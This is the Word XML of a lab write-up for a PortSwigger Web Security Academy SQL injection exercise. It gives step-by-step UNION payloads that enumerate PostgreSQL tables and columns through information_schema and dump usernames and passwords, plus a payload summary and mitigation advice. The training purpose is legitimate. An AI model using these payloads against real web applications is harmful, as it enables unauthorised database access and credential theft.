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DDAF" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4A6E"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2265B3" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A6B8A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Listing Database Contents on Non-Oracle Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA49025" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Academy  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Practitioner </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Level  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  UNION Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3AA8B2" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1A6B8A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Video Walkthrough: https://youtu.be/JduM_dO8glw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766728E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10458CC7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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573663F1" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This lab demonstrates a SQL injection vulnerability in a product category filter. Because query results are reflected directly in the application response, a UNION-based attack can be used to extract data from other tables — including a credentials table containing usernames and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA4F07D" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t>Log in as the administrator user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAAC061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37A32254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Vulnerability Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868C93C" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The application passes a user-controlled category parameter directly into a SQL query without sanitization. This allows an attacker to append additional SQL statements using the UNION operator to retrieve data from arbitrary tables in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FCB8AC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184568F7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Tools Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D89456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Burp Suite (Community or Professional) — for intercepting and modifying HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BF8175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01D633A9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Step-by-Step Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118878D2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1 — Intercept the Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8FBA07" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Use Burp Suite to intercept the HTTP request that sets the product category filter (a GET request with a category parameter in the URL). Send it to Repeater so you can modify and resend it freely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E06FB1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2 — Find the Number of Columns (NULL Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429A847" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Before using UNION, you must know exactly how many columns the original query returns. Inject NULL values one by one and watch the HTTP response code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D297080" w14:textId="1CB7B909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Attempt 1 — one column (</w:t>
      </w:r>
      <w:r w:rsidR="008B7727"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returns 200 OK</w:t>
      </w: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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CDCDFE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'+UNION+SELECT+NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17646DE8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Attempt 2 — two columns (returns 200 OK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795122CE" w14:textId="38B143FB" w:rsidR="008B7727" w:rsidRDefault="00000000" w:rsidP="008B7727">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F2F2"/>
        <w:spacing w:before="60" w:after="6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'+UNION+SELECT+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NULL,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B7727">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581906D9" w14:textId="11349250" w:rsidR="008B7727" w:rsidRDefault="008B7727" w:rsidP="008B7727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Attempt </w:t>
      </w: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3</w:t>
      </w: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 — </w:t>
      </w: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three</w:t>
      </w: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 column (returns error / 500):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7FBA2" w14:textId="7B56FAB6" w:rsidR="008B7727" w:rsidRPr="008B7727" w:rsidRDefault="008B7727" w:rsidP="008B7727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,NULL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5C1157E6" w14:textId="3B16EB64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>💡 When the response returns 200 OK instead of an error, you have found the correct column count. In this lab, the query returns 2 columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065F05F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3 — Identify Which Columns Can Hold Text Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C32084" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Not all columns can return string data. Test each column by replacing one NULL at a time with a string value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C31DAD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Test column 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195658C2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2097CBF7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Test column 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A789320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'+UNION+SELECT+NULL,'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'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB12F01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Confirm both together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E652748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','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adsa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'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0E0FB" w14:textId="77777777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>💡 Both columns return 200 OK with the string values visible — both columns accept text data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE3BF58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4 — Identify the Database Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B307BB9" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Extract the database version to determine which system tables and SQL syntax are available:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E071949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UNION+SELECT+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(),NULL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6161DE62" w14:textId="77777777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The response reveals the database is PostgreSQL. This matters because PostgreSQL uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unlike Oracle which uses ALL_TABLES).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D3FC7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5 — Retrieve Table Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A47787" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since the database is PostgreSQL, we know from documentation that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contains a column called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Use it to list all tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A65C3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UNION+SELECT+table_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name,NULL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+FROM+information_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schema.tables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656ED403" w14:textId="77777777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Scroll through the results and find the table that stores user credentials — something like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users_abcdef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7C85FC3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6 — Retrieve Column Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0EB288" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the target table is identified, enumerate its columns. PostgreSQL's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contains a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> column that lists all columns for a given table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3B419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'+UNION+SELECT+column_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name,NULL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+FROM+information_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schema.columns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+WHERE+table_name='users_abcdef'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4580C865" w14:textId="77777777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 xml:space="preserve">💡 Replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users_abcdef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your actual table name. The response reveals column names like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username_abcdef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password_abcdef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894B60F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t>Step 7 — Dump Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1968D0" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>With both the table name and column names known, extract all usernames and passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6EE11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'+UNION+SELECT+username_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abcdef,password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_abcdef+FROM+users_abcdef--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517801C7" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF4FA"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>💡 Replace the table and column names with the actual values discovered in the previous step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E91606" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A6B8A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 8 — Log In as Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE98C8" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Find the row where username = administrator in the dumped output, copy the password, and log in through the application login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537F7C4" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Lab solved! ✅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28DC24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6D9224EC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All Payloads (in Order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F5564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1. Find column count (increment NULLs until 200 OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BA748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 UNION SELECT NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D59B7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UNION SELECT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09176BF8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   200 OK confirmed → 2 columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295BC31" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="005166E5">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25619F5C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2. Confirm both columns hold text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B540E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 UNION SELECT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7244696F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 UNION SELECT NULL,'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'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458DCB0C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' UNION SELECT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','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adsa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'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB371C9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   Both return 200 OK ✅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E211179" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="005166E5">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A826B3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3. Get database version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE16F68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UNION SELECT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version(),NULL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797B9C1B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 xml:space="preserve">   Reveals PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1620A1E9" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="005166E5">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF022E9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4. List all table names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2378387C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UNION SELECT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table_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name,NULL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information_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schema.tables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561BBFFE" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="005166E5">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A1500A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5. Get column names from the target table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24883E2A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UNION SELECT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column_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name,NULL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information_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schema.columns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table_name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users_abcdef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'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C5A362" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="005166E5">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E19A893" w14:textId="77777777" w:rsidR="005166E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i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Dump usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964F9EA" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F2F2"/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UNION SELECT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username_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abcdef,password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_abcdef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users_abcdef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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D45462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09B60D4B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166E5" w14:paraId="1AC62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B9FC" w14:textId="77777777" w:rsidR="005166E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B3D1" w14:textId="77777777" w:rsidR="005166E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66E5" w14:paraId="1B11A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1037" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NULL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DCCE" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Incrementally add NULLs until 200 OK — safely identifies column count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005166E5" w14:paraId="0DE16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CCD5" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UNION Attack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C4E5" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Appends a second SELECT to pull data from other tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005166E5" w14:paraId="37CAB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5F2D" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>information_schema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F50D" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Built-in metadata schema in PostgreSQL, MySQL, MSSQL (not Oracle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005166E5" w14:paraId="23789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CB36" w14:textId="77777777" w:rsidR="005166E5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table_name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CC55" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Found in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>schema.tables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lists all tables in the DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005166E5" w14:paraId="0709B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8EF" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>column_name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0B34" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Found in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>schema.columns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lists columns per table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005166E5" w14:paraId="7AD3C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4DE3" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Text Column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D009" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replace NULL with a string literal to verify that column returns text</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005166E5" w14:paraId="6874D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FB9" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>version(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FC75" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL function that returns the database engine and version string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="663F364A" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="005166E5">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22129FE2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3F8C6343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Why This Works (PostgreSQL Specific)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C8EA18" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL exposes database metadata through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> standard views:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C94BA6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→ contains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table_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6267EA3B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→ contains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data_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4791CBD9" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>These are publicly documented and available to any authenticated database user with SELECT privileges, making them reliable targets during a SQL injection enumeration attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F462BAF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0206A8FA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Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D2E79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Use parameterized queries (prepared statements) — never concatenate user input into SQL strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC5E1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Apply the principle of least privilege — database accounts should not have access beyond what is necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01802521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Implement input validation and WAF rules as a secondary layer of defense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D150B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Suppress verbose errors in production — 500 responses and error messages help attackers enumerate columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD075C" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="005166E5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D03AE3" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4A6E"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476FEC42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PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SQL Injection UNION Attacks: https://portswigger.net/web-security/sql-injection/union-attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC778FE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PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Web Security Academy: https://portswigger.net/web-security/sql-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E797A06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PostgreSQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> docs: https://www.postgresql.org/docs/current/information-schema.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354AF22D" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005166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C627" w14:textId="77777777" w:rsidR="000B2753" w:rsidRDefault="000B2753">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7992EE90" w14:textId="77777777" w:rsidR="000B2753" w:rsidRDefault="000B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FFA9" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="2E4A6E"/>
      </w:pBdr>
      <w:spacing w:before="100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772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F4B7" w14:textId="77777777" w:rsidR="000B2753" w:rsidRDefault="000B2753">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51F21A6A" w14:textId="77777777" w:rsidR="000B2753" w:rsidRDefault="000B2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AA47" w14:textId="77777777" w:rsidR="005166E5" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E4A6E"/>
      </w:pBdr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">SQL Injection Lab </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Writeup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PortSwigger</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> Web Security 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52C44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F06E2FEE"/>
    <w:lvl w:ilvl="0" w:tplc="4336E416">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AF781F2A">
